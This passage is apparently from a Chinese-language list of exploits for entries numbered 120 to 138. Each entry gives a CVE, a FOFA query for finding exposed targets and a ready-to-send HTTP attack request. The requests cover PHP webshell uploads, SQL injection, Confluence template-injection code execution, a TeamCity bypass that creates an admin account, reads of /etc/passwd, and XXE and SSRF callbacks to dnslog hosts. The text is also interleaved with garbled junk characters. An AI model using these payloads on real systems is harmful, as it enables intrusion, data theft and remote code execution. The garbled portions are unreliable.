X-Forwarded-For: 1.1.1.18 N* r# u6 k7 n$ | R
X-Originating-Ip: 1.1.1.1$ O v4 n. x3 z( [1 i
X-Remote-Ip: 1.1.1.1
; n/ o X4 ?9 w9 z8 XX-Remote-Addr: 1.1.1.1) v3 j2 W4 h( M6 Y' K
Te: trailers
! v& a+ h- c% F$ PConnection: close4 s) D, @' Z1 `& B% w$ Q, _
& ?( [ P$ f6 b& X' x+ T$ s3 tsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456% A" E; g% {+ y* M
7 W: V8 _+ E0 [* ^8 X
F5 C( r% k' F9 F
120. 北京百绰智能S40管理平台导入web.php任意文件上传) S. ^, _& X/ X! l' l
CVE-2024-1253
" j" |5 N- k9 ]6 X1 y5 iFOFA:title="Smart管理平台"% H* z/ p& Z2 D* y6 y! A; }
POST /useratte/web.php? HTTP/1.10 q d6 A# L* b" V* V; A, v! |
Host: ip:port! a% `1 ~5 p+ r' Q5 _1 Q
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db3 J4 ?2 h0 `4 @5 `# ]1 a6 `7 T
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, L# S) r2 [: c8 {5 H2 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! g( n7 l: N6 V! e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 X2 C9 Z* c$ g& A# b! A& c
Accept-Encoding: gzip, deflate
( z& W0 X3 l" @, X- c, G4 n7 h. J7 pContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
( X2 d. k1 w, q0 x8 E' n) M& ? yContent-Length: 597 r$ h0 @, g" o$ h3 @) a" g
Origin: https://ip:port
; B% R. m: b) o' i% N" k1 `, M# QReferer: https://ip:port/sysmanage/licence.php
: b+ N& x" [8 l7 n1 QUpgrade-Insecure-Requests: 1 s" @) z/ a, s$ O
Sec-Fetch-Dest: document
/ B6 |0 z" v4 {, m) [Sec-Fetch-Mode: navigate3 T( q, ^6 I" d4 Y' A: F0 b
Sec-Fetch-Site: same-origin9 N) x+ b4 h9 Y. |0 s; k, y5 o
Sec-Fetch-User: ?17 A( G- Y2 W0 t
Te: trailers3 z/ y6 b, o# C9 w" i
Connection: close' z* e4 x# U, h( V
( C# M# E! A8 I# O2 x- Z+ R6 r& s
-----------------------------42328904123665875270630079328
# g4 K5 x8 G6 T- rContent-Disposition: form-data; name="file_upload"; filename="2.php"
' z$ X* }, K! z% h7 b4 OContent-Type: application/octet-stream* z ~8 w2 s1 R4 W# M
) ?" l6 B" F: G# ~) S3 m; \5 s
<?php phpinfo()?>
7 Z1 U& i+ |" c; M* o2 A- R/ o2 d-----------------------------42328904123665875270630079328
3 V6 b5 D. I2 B- j3 ]Content-Disposition: form-data; name="id_type"
7 E' D- \$ v! P: |
& k* \, F5 {7 \* F1. u7 ^0 e( ?, o9 N! y9 U
-----------------------------42328904123665875270630079328& R, z$ v: l8 t
Content-Disposition: form-data; name="1_ck". ^7 ^# J: n7 Q% ]7 o) k( F( J
* L# u- a. M+ K- w; D! q- m
1_radhttp
R# t# B& x' D: N" e-----------------------------42328904123665875270630079328, P3 H# O) j% I. S' Y
Content-Disposition: form-data; name="mode"
* V1 j4 v$ O# y, I0 K. j6 D
4 f5 W0 O' Y! y8 c+ \+ iimport
0 A: d$ }% ~" _+ \7 t. x' ]-----------------------------42328904123665875270630079328
) d. A# h, n$ s- l( t$ K' A8 Q: r0 j- j2 |' b: J4 D: G
. M! U# e/ S; m2 B; t0 W文件路径/upload/2.php8 W9 } D1 g5 ~4 P
- X5 |6 m* [# C% W' o8 f) [
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ p6 |* [. Q* h1 }2 i' o0 GCVE-2024-1918
+ Q# F8 o* m$ Y& HFOFA:title="Smart管理平台". d6 B. Y+ `2 l+ x3 z
POST /useratte/userattestation.php HTTP/1.1 t% [# M1 B* [0 T3 B
Host: 192.168.40.130:8443
- ?9 g8 n( G% s3 [9 ACookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
' F& ~# \% x6 ?% ?$ b$ r% P/ VUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ R: `" X2 k) f9 B/ {" L% h8 r( c0 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; e) \: m3 C) _! s4 z; j- M9 Z1 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" \/ ?1 c) b# x0 U; I! oAccept-Encoding: gzip, deflate
' x5 L6 O" z3 uContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 T3 h; n/ L& C. D5 J# r8 H0 W
Content-Length: 592
: n; z. |% e e5 j! vOrigin: https://192.168.40.130:8443
8 J) P5 Y& s+ t# lUpgrade-Insecure-Requests: 1: s$ M$ |# v9 V
Sec-Fetch-Dest: document; n+ G( ^# ^ N; {# Y
Sec-Fetch-Mode: navigate# }" f( z" j; l- G( B
Sec-Fetch-Site: same-origin
, p: R# }( T; V/ t+ Z. y! WSec-Fetch-User: ?18 {) ]7 o6 Y3 e4 A. P
Te: trailers! n9 o6 o7 b) [2 S$ y# y
Connection: close$ Z7 D* d( o" Y" ?- u7 x; W2 R2 G
# z' U. q) z6 O+ t-----------------------------42328904123665875270630079328) p- q7 s+ j* L+ I4 `+ {! k% f
Content-Disposition: form-data; name="web_img"; filename="1.php"' W' b2 y7 c$ E: E
Content-Type: application/octet-stream @$ b. `" m* Y6 Z/ b
3 O8 e" F% S( }4 c8 f$ g* L0 i<?php phpinfo();?># s8 H& y) o, v" l4 d
-----------------------------42328904123665875270630079328
1 o3 o7 |/ N. v7 b/ W8 J7 ~Content-Disposition: form-data; name="id_type"( u. J+ S0 @, l1 M& K
+ y* o$ _- A4 o7 y% P' y( y, b' J1: }* J* H$ S' L4 f+ e& c( W' ~) Q! q
-----------------------------42328904123665875270630079328
. j7 b& }3 ?; n, W! R% dContent-Disposition: form-data; name="1_ck"$ [, e W* z% {: p( g
/ @' b0 P# R' X1_radhttp$ i7 U5 T3 L' `8 Z1 H
-----------------------------423289041236658752706300793281 l0 t, x& R# C, J8 s
Content-Disposition: form-data; name="hidwel"3 c7 B2 w, H6 y7 E5 K0 B# u, U3 @
2 h' R5 [ R) m0 u$ D9 }
set
3 u: |/ V B1 g' p5 k8 A+ E( Y-----------------------------42328904123665875270630079328
d. G7 X; }( {4 t% c2 O7 P2 s: P/ l! X/ x u
: u6 g; Q- W9 @( Kboot/web/upload/weblogo/1.php
+ Y S/ q, Y. [* @3 I, j o! ~ j( L R+ K1 P4 h4 n
122. 北京百绰智能s200管理平台/importexport.php sql注入) I* Y" m/ R) r3 E, V9 m2 V- L
CVE-2024-27718FOFA:title="Smart管理平台"
$ | V+ t; ^" Q c7 K其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()1 E' q1 J% {: A' H3 K
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1+ r4 k% x8 L/ v U% ^% q" L
Host: x.x.x.x
3 |) j D( R- t! O( b3 a3 I' ]Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc08 X$ y3 U( H, j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- X! X, S: u* J) a5 m! Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 v. |) R( }$ T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ D1 Q, G2 {' J9 |7 L% D2 I1 cAccept-Encoding: gzip, deflate, br5 W0 Z' I, t% w* c- ]5 [
Upgrade-Insecure-Requests: 1
9 q6 P1 f5 Q8 p8 p( RSec-Fetch-Dest: document: q9 v( r: Y( v9 j" C$ l. D( S
Sec-Fetch-Mode: navigate
' V( r6 Z, u6 pSec-Fetch-Site: none* y1 q7 ]7 B8 g2 `& ?9 x; L$ i
Sec-Fetch-User: ?1
1 x B* g; b! U+ c2 ?2 H& C# Q- w, J! ITe: trailers, {! M' z' D6 J$ K6 r0 b6 H8 a
Connection: close5 L! }! d3 |+ V9 P s
* y9 A7 H3 E9 \) S' g, W
9 q' c6 M' l% ]& d123. Atlassian Confluence 模板注入代码执行
. U1 O! p5 a9 D# q7 R6 |7 gFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
6 ~3 Y/ R: I: APOST /template/aui/text-inline.vm HTTP/1.1
1 o% _' N0 U0 D1 U$ c/ d5 @" tHost: localhost:80905 {; I8 Y* @ s' O4 v ?+ r! p
Accept-Encoding: gzip, deflate, br% J+ B0 Z/ g% `" ^' W* v; |
Accept: */*2 H/ _+ a0 T1 }) B5 Z( U4 i" ]4 q6 E
Accept-Language: en-US;q=0.9,en;q=0.8
/ I/ E- k1 _" z7 X+ y2 M2 w" ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36- T6 g9 p+ w* T, G: l) d, ]& l$ V
Connection: close3 V+ t6 k4 b- a4 h# a) W8 s0 e
Content-Type: application/x-www-form-urlencoded2 c% w. i w/ V4 K
' w1 k0 J) M6 |* P; A# I) J
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
! Y9 n3 B5 ^4 m9 {
N `& O c" M0 X' f. Y. V/ J: ?1 |. v8 {. a
124. 湖南建研工程质量检测系统任意文件上传* g4 V0 e4 X* r ?8 d5 O9 o" |
FOFA:body="/Content/Theme/Standard/webSite/login.css"3 @( s* R7 U& e9 H
POST /Scripts/admintool?type=updatefile HTTP/1.19 d2 U8 K' z; |/ m) u
Host: 192.168.40.130:8282
2 M1 ^; L/ l6 c; w; m! TUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* a! y, ], X8 ]0 kContent-Length: 72+ h% i) q( K6 N( W: b5 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.89 U* [4 n& n4 l1 Q& ~* i" M/ }
Accept-Encoding: gzip, deflate, br" d/ g- d5 ~) T0 D$ \! [) V R+ [( U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* I% e# b. l6 b2 [9 J6 s6 KConnection: close2 q( E3 Q p5 g! }; t
Content-Type: application/x-www-form-urlencoded; f. M% j2 X g7 v' E$ a3 q9 D* e
. Y- [, k, g/ Z1 t G6 q# }' n& Q( T! j
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>3 @$ F$ I& }- i
5 X4 N9 x8 E4 I$ a
0 S. G2 V2 z! y" L4 @http://192.168.40.130:8282/Scripts/abcgcg.aspx9 ~- u+ {) p- G
. ^% R9 _7 Q* b+ `( v: g2 l8 [3 ]
125. ConnectWise ScreenConnect身份验证绕过
( k. u9 E; D0 }' O, }0 @, C4 c* tCVE-2024-17098 X) e* H9 Z& ]7 z7 X. c; \
FOFA:icon_hash="-82958153"
6 ^1 W9 t8 I! @& Y- q% mhttps://github.com/watchtowrlabs ... bypass-add-user-poc, s$ Y; w, O8 J: J0 M( k
, Z, L5 ]" W& i9 y+ q
( P; t ~! @2 g* F使用方法" M5 [. `) a, T0 Q: |. s
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!7 @6 H0 ~# Z! R
+ l1 l7 K% ^) p% e% A
/ U8 g2 |/ J/ U9 h* s创建好用户后直接登录后台,可以执行系统命令。 w" X. V+ m7 }& B, d: d! g2 ^" H
; V% u4 R6 c* N2 U4 s126. Aiohttp 路径遍历9 c/ ?* d% Y5 J1 Q0 h
FOFA:title=="ComfyUI"
8 ~' Y0 }6 X3 xGET /static/../../../../../etc/passwd HTTP/1.1
. u. o! q# X5 R% A: { o& @Host: x.x.x.x) g; g) Y6 ~% l) E( u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 N1 `( T9 V% B5 j$ m0 ?* X
Connection: close
1 n) w0 D1 p8 V2 BAccept: */*
6 F/ `" D6 {* ?" V. v+ ]Accept-Language: en1 r# \" f9 d( ?: N( [5 @
Accept-Encoding: gzip: X+ w& t8 k8 o% H/ G9 D" J% N
1 s1 C4 J" r$ w' x# u# e7 g2 V
: O) L! e" o, r) @127. 广联达Linkworks DataExchange.ashx XXE
" a/ z5 X+ y) S2 E8 BFOFA:body="Services/Identification/login.ashx"
9 b3 T$ L/ K8 u. V/ w# g8 `! cPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.14 G' O! A% d6 Q3 V1 e* o* B% x* u
Host: 192.168.40.130:8888- r; v* h3 n. |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
4 j; p" P( g% b% |Content-Length: 415
/ W7 ^: W: _' j! S) W2 a& [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' _) e a6 H9 e5 D
Accept-Encoding: gzip, deflate
( _# k6 G) v h4 A3 X9 ?Accept-Language: zh-CN,zh;q=0.9$ r `- j f3 ]* }3 v
Connection: close
( E2 V* J1 [3 k0 kContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
3 }8 P# ] P6 d$ c& |3 jPurpose: prefetch
1 d) q* W6 z& {, Y' R, q7 NSec-Purpose: prefetch;prerender) P, d5 L7 n2 P; t
! x% I/ s& a S9 `( S
------WebKitFormBoundaryJGgV5l5ta05yAIe0
( @- Q+ h6 }0 A; s9 g3 }: MContent-Disposition: form-data;name="SystemName"; y- ^9 [) e- J4 w( H
U4 O1 m, [( N) c0 f/ H' g
BIM8 N( Z, u0 C# D. ?% H
------WebKitFormBoundaryJGgV5l5ta05yAIe0) }7 a' Z: p. I& V6 Y
Content-Disposition: form-data;name="Params"0 S* _' Q& {7 J9 i) {
Content-Type: text/plain* [: D K# k- H+ B, i0 w
5 V* m; e. Z% ~# g<?xml version="1.0" encoding="UTF-8"?>
; I) s* c/ A6 p6 r<!DOCTYPE test [
' Q2 F# \$ o4 X/ j, o. U6 P; C8 @<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
8 B% u' ?8 Z- e- D! v7 h]
' H0 ]" B2 w# n% ~7 S>
u! K. q' s2 z T! E" h' G<test>&t;</test>2 s5 ]/ n2 o1 \0 a5 @- K9 x
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
) n6 Z6 F* v! e" o, E8 S
/ V4 @0 _# c0 Q" ?4 M& T& ?% ^( D4 ?
, b8 }) f3 f8 G' Y" X; x: n6 P q2 S# C$ _
128. Adobe ColdFusion 反序列化
( B2 h S- N8 \CVE-2023-382030 f7 Y" L! J. V) M2 w1 v
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
! M( u# Y. D: j$ ]5 L* }FOFA:app="Adobe-ColdFusion"
9 u2 G: I e# vPAYLOAD
, |7 x3 ~: L: o( o5 E- b9 z& h8 q9 X: m7 A2 N; ?# p% c
129. Adobe ColdFusion 任意文件读取
$ n7 z) G$ m: F$ g- D; dCVE-2024-20767
. p4 _3 z* o/ m( r/ m$ XFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request". [0 }+ _% q$ m& V( K- g
第一步,获取uuid4 h- A" N" l% I! }
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.18 H3 S0 L) i5 @8 R
Host: x.x.x.x3 O% u$ e% T% f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 }+ D3 f0 I5 w+ y" I
Accept: */*, s' F: E& @8 J2 [
Accept-Encoding: gzip, deflate
7 B$ k [3 }$ O8 m) }: z, cConnection: close6 a4 s! e) s$ L7 v8 ^+ }
9 _! P; ?( V+ {/ E! Q
& B( R! x2 `. ? E8 ?: e G; a
第二步,读取/etc/passwd文件, U/ |: f( `7 v2 ~! w1 k! r7 l( R; _
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
3 f" W# f7 l' q, LHost: x.x.x.x
, _- u; N. v5 m! { Z7 r% M: lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 u9 |1 F* N$ s6 c- XAccept: */*
/ K) y+ h6 U: E' r4 m r, |, K$ g- E( e2 fAccept-Encoding: gzip, deflate9 x6 ]% D1 V+ P
Connection: close
4 d2 j; |& H# l/ D1 U" a- Nuuid: 85f60018-a654-4410-a783-f81cbd5000b9. T+ k2 Z; _+ [' k4 e3 u
) N8 Q S4 Q+ y" |) q8 I5 {2 d" a, O% i, l& w K) z# w- C
130. Laykefu客服系统任意文件上传
1 C | C3 P4 c) u, yFOFA:icon_hash="-334624619"' n1 y% g) s3 B& D$ y
POST /admin/users/upavatar.html HTTP/1.19 `) q- j+ a4 D7 g8 _- Z
Host: 127.0.0.19 _7 T% _1 R0 d/ b1 N3 d" [
Accept: application/json, text/javascript, */*; q=0.01
7 S4 ?. K1 X5 s# n/ Y: f0 N! IX-Requested-With: XMLHttpRequest$ Z' \5 P9 e0 V; \* B4 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26) \+ v! Q* d; `* r3 ]# p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR$ L: V9 ^- v/ N4 Q* U' T* a
Accept-Encoding: gzip, deflate
, U8 m- F* E8 [" q5 kAccept-Language: zh-CN,zh;q=0.9
1 ?# Y9 W6 v9 S5 A& W4 ICookie: user_name=1; user_id=3
( M/ E! o; _# B& nConnection: close
- j! f: ]. V/ y% d" [5 {' U
: _: h7 R9 t2 Q' }, }------WebKitFormBoundary3OCVBiwBVsNuB2kR
+ ]) U4 c+ l- z/ G+ p V7 v: [Content-Disposition: form-data; name="file"; filename="1.php"
! `* C6 w8 N3 v& cContent-Type: image/png5 e/ A8 O5 T# w0 l3 I
/ ?4 S9 L V5 V+ a
<?php phpinfo();@eval($_POST['sec']);?>/ Z! H$ C% F1 C+ ~9 b: x' [& ?0 v
------WebKitFormBoundary3OCVBiwBVsNuB2kR--0 j8 r# [+ G# W
/ j5 T3 L9 M4 @$ r6 J+ {1 M' u6 P. H8 X* b9 h( y$ a! f
131. Mini-Tmall <=20231017 SQL注入+ D& y9 k% q, }/ L* t# P% O3 f
FOFA:icon_hash="-2087517259"
- f+ F% J. {2 U- }; N! A后台地址:http://localhost:8080/tmall/admin( M6 a3 W d7 v* ]/ m2 X3 k; k7 c3 X
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)1 {1 i& `2 Z) |
0 N: Y3 u9 i3 V6 {
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 E; e1 h6 ]$ _. s, x
CVE-2024-27198* V, _% `0 P j: \. C# K. G" j: ~
FOFA:body="Log in to TeamCity"5 J" `% x- R$ f" d( w8 [
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
+ m1 y6 c7 u( O6 @9 c7 BHost: 192.168.40.130:8111
: k' [/ {/ `- N% yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& P9 H/ B# S5 R2 Q) {
Accept: */*' n5 ]- E* d/ m2 c7 u
Content-Type: application/json9 H, G: l$ W. z# y7 L& i
Accept-Encoding: gzip, deflate
; d( v# q* @, F, V3 w4 m8 J8 ~: @9 W Q1 ]% M A# V3 J
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}7 x( g- S0 s) J3 A: r0 ^* d$ S
2 I" m+ i; k: S, w' c; Y7 V3 K
# m+ c2 ~" F7 }7 |, JCVE-2024-27199
) C/ Q* {. |6 v& P8 j% Z; G/res/../admin/diagnostic.jsp" w3 p* h) {1 m% w2 O
/.well-known/acme-challenge/../../admin/diagnostic.jsp
& H$ D0 ^& ]/ G3 V/update/../admin/diagnostic.jsp) H) V- q9 @' w3 k
) @2 `/ D: X4 i! Y% M5 b$ M- j
5 x# W4 [& ~2 ?' YCVE-2024-27198-RCE.py
0 j& f( q. b+ d, C2 S, _9 Q4 \" t
$ M) V; t- G4 D/ k133. H5 云商城 file.php 文件上传
; q0 F. y! }8 mFOFA:body="/public/qbsp.php"
' M; k5 y d2 uPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
- `8 x) [# W7 u8 ~Host: your-ip& R: [$ u. `) r; q5 C0 s8 [7 G3 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ B/ `' m1 F, Y1 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
' T! u" p1 I7 e0 ^2 N% T( D& I) h$ S) ?
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ r2 o! H, R; Y' ^Content-Disposition: form-data; name="file"; filename="rce.php"
1 f/ U! O0 p2 t5 iContent-Type: application/octet-stream5 F- n/ t, Y) C0 V
( G5 \) D3 p$ H) A& N% f' `( L& D
<?php system("cat /etc/passwd");unlink(__FILE__);?>0 h& H4 Z3 o, C+ Z* [: B7 ?( X( Z
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--' n4 K- E9 Z9 f5 m
- `! e. g0 g1 ]2 U1 {
0 a& {/ `& Y8 L" e" k$ J: h2 k0 ?. o* n! g- h
134. 网康NS-ASG应用安全网关index.php sql注入
' u. q, l( O1 qCVE-2024-2330
, E5 f6 m- e2 cNetentsec NS-ASG Application Security Gateway 6.3版本+ A( f- D+ W1 o( _
FOFA:app="网康科技-NS-ASG安全网关"! P# ]1 s( n" J$ G% s7 m* N
POST /protocol/index.php HTTP/1.1
, N' _; A; O3 g7 M8 h/ r6 W7 SHost: x.x.x.x5 h3 P/ m' G" q5 H& |* Z' |' m% l
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de8 t0 ]7 h: X, t" `& Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! q0 s7 M4 q5 M& I$ i3 K8 `
Accept: */*
4 I& C9 j7 S5 C2 F+ R( RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) H0 G) V3 [# v$ j( P
Accept-Encoding: gzip, deflate
7 `/ p8 N$ Y7 [* W" I1 v6 D4 pSec-Fetch-Dest: empty }( y8 E9 v, Z$ i# v/ X$ a
Sec-Fetch-Mode: cors; _6 q% o! E; \+ r0 W- g0 F
Sec-Fetch-Site: same-origin
9 C: Q4 g8 V- OTe: trailers
5 y& N7 ^; j' M' oConnection: close4 }+ j; }8 p4 R) {/ r; |4 T
Content-Type: application/x-www-form-urlencoded7 A# w1 A& ^; C
Content-Length: 263
0 @% \' h, l6 F9 ]$ W1 i6 J3 @2 f1 ^$ {2 p8 g5 l% x: L
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}, j1 c: A0 E# Y; d" _
/ n5 J6 P& n* y6 R j& U
: t# c* @ J. k: i( ^135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
! s2 \ c. B6 ^* dCVE-2024-2022# n+ L7 I& ` B$ N4 N
Netentsec NS-ASG Application Security Gateway 6.3版本' o0 ]1 w" M* W" F. U
FOFA:app="网康科技-NS-ASG安全网关"+ n2 \6 W0 S. T+ j
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* ]# _* Q1 R( X4 g
Host: x.x.x.x8 Y0 I+ P! ?) {9 U. X: v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ E- e7 l0 r7 t0 f1 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 [+ ] e* }8 uAccept-Encoding: gzip, deflate
8 u/ ~1 [9 X7 N; m9 j# IAccept-Language: zh-CN,zh;q=0.9
- {. G4 {2 H# G3 B; EConnection: close
5 C3 R' X# C+ F6 q! m# C( t9 Y7 W& U; G8 i) t& l3 m6 G" o' G
6 A- c2 k- Q0 d" q: Q* }) q; x
136. NextChat cors SSRF0 J$ F, j" k& Q a. c7 ?
CVE-2023-497851 V3 N) e5 P1 }1 T1 d2 t# R7 E% h
FOFA:title="NextChat"
# Z4 g$ `. K7 yGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1$ L g! ^% H' {3 U) T
Host: x.x.x.x:10000; g; k5 B( u: x6 V3 q$ k4 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) a/ o% \! g/ L" b+ Y
Connection: close! s, |2 C) B/ k; Z7 L
Accept: */*
( L! o, b! P# N6 l) BAccept-Language: en
8 x+ _. T, y8 _7 C K# S" g' jAccept-Encoding: gzip! t; c% L! A1 Y1 a! a9 x
1 d+ t0 s- m0 n1 l* W: }/ v- a. e" Y) }
137. 福建科立迅通信指挥调度平台down_file.php sql注入
5 U' W- j5 a7 D, pCVE-2024-2620: t% K( ?# y- i8 e9 h* Q: Y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
^( k8 \, x1 l7 `GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
$ }* z q; E9 v6 q4 [- [Host: x.x.x.x
$ ^' f, _: H- F7 S% K" fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# y5 P) M: A5 O# E7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' B7 F) |- D. l/ a2 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& v; h2 s$ E3 D1 l/ ]+ Q1 SAccept-Encoding: gzip, deflate, br% P) s) n( o, K: V3 @% m
Connection: close
: d4 T1 e1 Q1 o/ q- y8 ECookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj5 d3 @- T3 i3 E( V
Upgrade-Insecure-Requests: 1! ~* b: X' c6 m0 C2 R
1 R" z0 ]/ j( s0 f u
+ ~0 x) G2 p/ I Z& i& d* m, a138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- \- ]! c9 P9 T+ D! XCVE-2024-2621& R' ]4 E0 R. J+ y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 f8 h6 Q; M. zGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1) d; k5 y, G" t/ ]1 A
Host: x.x.x.x: n H1 |0 n, D* l' i1 A( p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: Q: V7 k/ L8 L# v0 N* c- H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. s) G8 i9 A7 T" F5 Z$ ]; E+ dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, I$ s5 L1 A( ]Accept-Encoding: gzip, deflate, br
6 h" p @2 ^& u( lConnection: close
( ? D6 F, P+ r* V1 v9 SUpgrade-Insecure-Requests: 14 C Y% f; o2 k$ t. |: M B
1 `% G' D) t" L e1 J4 p
